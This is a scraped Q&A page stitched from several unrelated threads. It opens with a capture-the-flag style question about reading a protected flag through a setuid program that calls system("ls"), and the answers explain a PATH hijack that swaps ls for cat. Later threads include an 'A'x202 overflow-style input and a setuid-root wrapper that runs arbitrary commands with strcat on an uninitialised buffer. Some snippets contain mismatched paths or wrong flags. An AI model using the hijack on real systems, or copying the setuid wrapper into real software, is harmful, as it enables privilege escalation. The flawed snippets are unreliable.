I am trying to solve this problem, I am only allowed to run ls command and my objective is to read the flag. There is a vulnerable C code which has setuid.
-rwsr-sr-x 1 lameprogrammer lameprogrammer 8579 Sep 15 07:21 vul_c
-rw-r----- 1 lameprogrammer lameprogrammer 154 Sep 15 07:40 flag
I am user attacker and I have to read this flag file. The given C code is
#include <stdlib.h>
#include <stdio.h>
#define FILENAME "/var/challenges/attacker/challenge1/flag"
int main(void)
{
int vert;
vert = system("ls " FILENAME);
if(!vert)
puts("Flag is at " FILENAME " :P ");
else
puts("Sorry! no file is there");
}
I was trying to convert ls into cat so that if that runs then it will read the flag file. To do that I copied all the bin folder into my local space and then I replaced ls with cat and then exported the new PATH. Technically it should replace and my ls command should work like cat but it is not working. The following are my command :
cp -r /bin /home/attacker
cd /home/attacker/bin
rm ls
cp cat ls
export PATH=/home/attacker/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/usr/games
The ls command is not working as cat and output is:
ls: unrecognized option '--color=auto'
Try 'ls --help' for more information.
When I am trying to run ./vul_c it says permission denied and then it is printing Sorry! no file is there.
Any help onto this would be great.
You are in the right direction but you are just putting too much effort for this small thing. Instead of creating a program why don't you create a symlink and then point this to cat.
Try this step:
ln -s /bin/cat ls
Finally, export this and I hope you will be done with your solution. In this, you don't even have to worry about permission. Let me know if it works.
Does the program work? The problem as I see it is that if you use ls in the shell, is that it has an alias that will enable the colouring, i.e. something like
alias ls='ls --color=auto'
Now this is something that cat wouldn't understand. But it would be only for your shell, not the ls command run by that script, because it wouldn't use the aliases. Perhaps something like unalias ls would help in the shell.
Now, the system function cannot run your ls because it doesn't have proper rights - you forgot to chmod +x ls.
Try the following command:
unalias ls
Related
I have installed a software named "OMPi" (after make, it generated two executable file ompicc and ompi, and you can use ompicc -x file to do something, and ompi will be called by ompicc).
When I run the command ompicc ~/Documents/example.c in the directory "/my_path/ompi-1.1/compiler" (ompicc is here and ompi is in the sub_path "./ompi/"), an error occurred sh: 1: /my_path/ompi-1.1/compiler/ompi: permission denied. But when I ran the same command in any other directories, the error didn't occur.
sudo chmod 777 -R ompi-1.1 is no use.
I think it may be because the sub_path "./ompi/" get the same name with file ompi. So, I created a directory named "ompi/" in home_path, and then ran the above command. To my surprise, the error didn't occur. It seems that the error only occur when I run the command in the directory: /my_path/ompi-1.1/compiler/
information in terminal
From the looks of it (I have briefly checked ompi's source code), the ompi program is expected by ompicc to be in the same directory. It worked fine after you had created /ompi/ in home directory, because you still had executable of the same name in the same directory as ompicc. It doesn't work in the directory you specified because there's only one ompi there which is a directory.
Line that does the execution in ompicc.c (the constructed command is then ran by a system() call:
sprintf(cmd, "%s%s%s \"%s.pc\" __ompi__%s%s%s%s%s%s%s %s > \"%s\"%s",
usegdb ? "gdb " : "", /* Run gdb instead of running _ompi directly */
RealOmpiName,
usegdb ? " -ex 'set args" : "", /* Pass the arguments */
/* ...further arguments here... */
To confirm that RealOmpiName is 'ompi' i followed the program and
RealOmpiName is traced back to (through external symbol OmpiName)
Makefile.am:
-DOmpiName='"_#PACKAGE_TARNAME#"' \
Which then is used like this (to install the software):
cp -f ompi $(DESTDIR)$(bindir)/_#PACKAGE_TARNAME#
cp -f ompicc $(DESTDIR)$(bindir)/#PACKAGE_TARNAME#cc
I think the installer wouldn't put the two programs together if it didn't require the two to be in the same directory in the first place.
Solution: ompi and ompicc have to be in the same folder/directory.
I have a c code and I want take my code a perl command as argument like this:
./code ''perl -e 'print "A"x202;'"cat file
"cat file": command not found
I have cat command in my machine.
could you possibly tell me what the problem is?
thank you in advance
I'm not exactly sure how you want to use the cat command in your case, however, as #ikegami said, you are nesting quotes. In your perl part, use q{} or qq[] to get single or double quotes, and circumvent actually typing them out -- what you use as a delimiter is free with q and qq
use double quotes for your perl script if you can, so what you get is
./code 'perl -e " use q<> or qq++ here "'
It could be that your path is not correctly set inside your code.
I would advice to pass the full cat command path.
You can get the full path of the cat command by typing:
which cat
In my machine the cat command is located in /bin directory, therefore I would give:
./code ''perl -e 'print "A"x202;'"/bin/cat file
I develop a C code on Linux (Debian). Time to time, I need to execute some commands through system()
I wonder if it is possible to execute a command via system()as root. If it is not the case, is there any function to execute a command (or run a binary) as root that I can use on the C code?
We met the situation before that we want to execute a root command by a normal user, here is our solution (using setuid/SUID):
assume that:
username: Tom
group: gTom
C program file: my_pro.c
Step 1: Write a C code tool: my_sudo.c
...
int main(int args, char *argv[]) {
if (args < 2)
printf("Usage: my_sudo [cmd] [arg1 arg2 ...]");
// cmd here is the shell cmd that you want execute in "my_pro"
// you can check the shell cmd privilege here
// example: if (argv[1] != "yum") return; we just allow yum execute here
char cmd[MAX_CMD];
int i;
for ( i = 2; i < args; i ++) {
// concatenate the cmd, example: "yum install xxxxx"
strcat(cmd, " ");
strcat(cmd, argv[i]);
}
system(cmd);
}
Step 2: Compile my_sudo.c to get a my_sudo executable file
sudo chown root:gTom my_sudo // user root && gTom group
sudo chmod 4550 my_sudo // use SUID to get root privilege
#you will see my_sudo like this(ls -l)
#-r-sr-x--- 1 root my_sudo 9028 Jul 19 10:09 my_sudo*
#assume we put my_sudo to /usr/sbin/my_sudo
Step 3: In your C code
...
int main() {
...
system("/usr/bin/mysudo yum install xxxxx");
...
}
#gcc && ls -l
#-rwxr--r-- 1 Tom gTom 1895797 Jul 23 13:55 my_pro
Step 4: Execute./my_pro
You can execute the yum install without sudo.
If you are a user on your system that has sudo privileges to run commands as root, just pre-pend sudo to the command.
system("sudo yum install some-package");
If you want anybody to be able to do it, then you have to be administrator on your system, change the owner of the file to be root, and modify the permissions of your executable to run as root. By doing so, you do not need to modify your system() command string with sudo.
chmod +s my_program
chown root my_program
Realize that doing this may open you up to security problems, unless you have proven that your program has no security issues.
The file-system may be such to disallow you from setting the setuid bit on your program. If you need more information along these lines, you should consult SuperUser.
This is one of those bag-o-tricks things to keep in mind. There are security risks, so just be aware of who will use it. In the "system" command you can even execute external scripts...although that opens major security risks because while this binary has to have the permissions re-set every time it's compiled, a script can be changed endlessly and this binary will keep calling it.
#include <stdio.h>
#include <stdlib.h>
//Create as root
//gcc fixmusic.c -o fixmusic
//chmod u+s fixmusic
//now run as non-root user and it should work despite limitations of user
int main(int argc, char *argv[] )
{
setuid(0);
char command[100];
sprintf(command,"/usr/bin/chmod -R a+w /mnt/Local/Music");
system(command);
//This is just optional info if someone cat's the binary
volatile const char comment [] = "INFO: Fixes music permissions";
return 0;
}
I want to get the Output of multiple strace calls in one file,
but i do not know how.
At the moment i am using:
strace -o tmpfile, but this just puts the output of one file in and then overrites the file with the new output.
Has anyone an idea, how to do this?
I hope this is no dumb question.
Thanks in advance.
Under the bash shell use the following command
strace -o >(cat >>outputfile) command [args] ...
This will pass to the -o flag an argument that will appear like a file, but will be instead a file descriptor to the standard input of the
cat >>outputfile
process. This process will append its input to the specified output file.
Instead of strace -o somefile command, can you just do strace command >> somefile? Alternatively, assuming a similar version of strace, my manual for strace indicates this should work: strace -o "|tail -a somefile" command (the -o "|command" functionality is implemented by strace itself, not by the shell).
I could not manage to do this via the call itself (in the Android Shell).
I just read through all files and write them to one Log file.
This solution slows the whole process down, but was the only solution I found.
The strace output is on stderr, strace 2>> outfile did the trick for me. If you invoke strace as single command you have to call it like this: adb -e shell "strace -p pid 2>> file"
I want to write a program that monitors syslog and performs an action when PPP authentication fails.
I think "tail -f /var/log/syslog" could help, but I'm not sure how to use it... probably using pipes?
I have found something similar written in bash, but I'm not sure how to implement it in C.
This is the bash method:
First create a named pipe using mkfifo:
$ mkfifo -p /home/mezgani/syslog.pipe
Make syslog.conf to points to this file:
*.info |/home/mezgani/syslog.pipe
Restart syslog:
$ sudo pkill -HUP syslogd
Create processing script that read the pipe
$ cat > foo
#!/bin/bash
cat /home/mezgani/syslog.pipe | while read input
do
# some stuff
echo ${input}
# ….
done
Finally I could found the solution!!
The solution was using named pipes!
First, I need to create a named pipe:
mkfifo /pipe
Then, I feed the pipe with the log info:
tail -f /var/log/syslog > /pipe
And then, I read the pipe from the C program using OPEN
int pipefd;
pipefd = open("/tmp/myFIFO", O_WRONLY);
Try to use inotify function. Using it you can monitor if a file or directory has changed.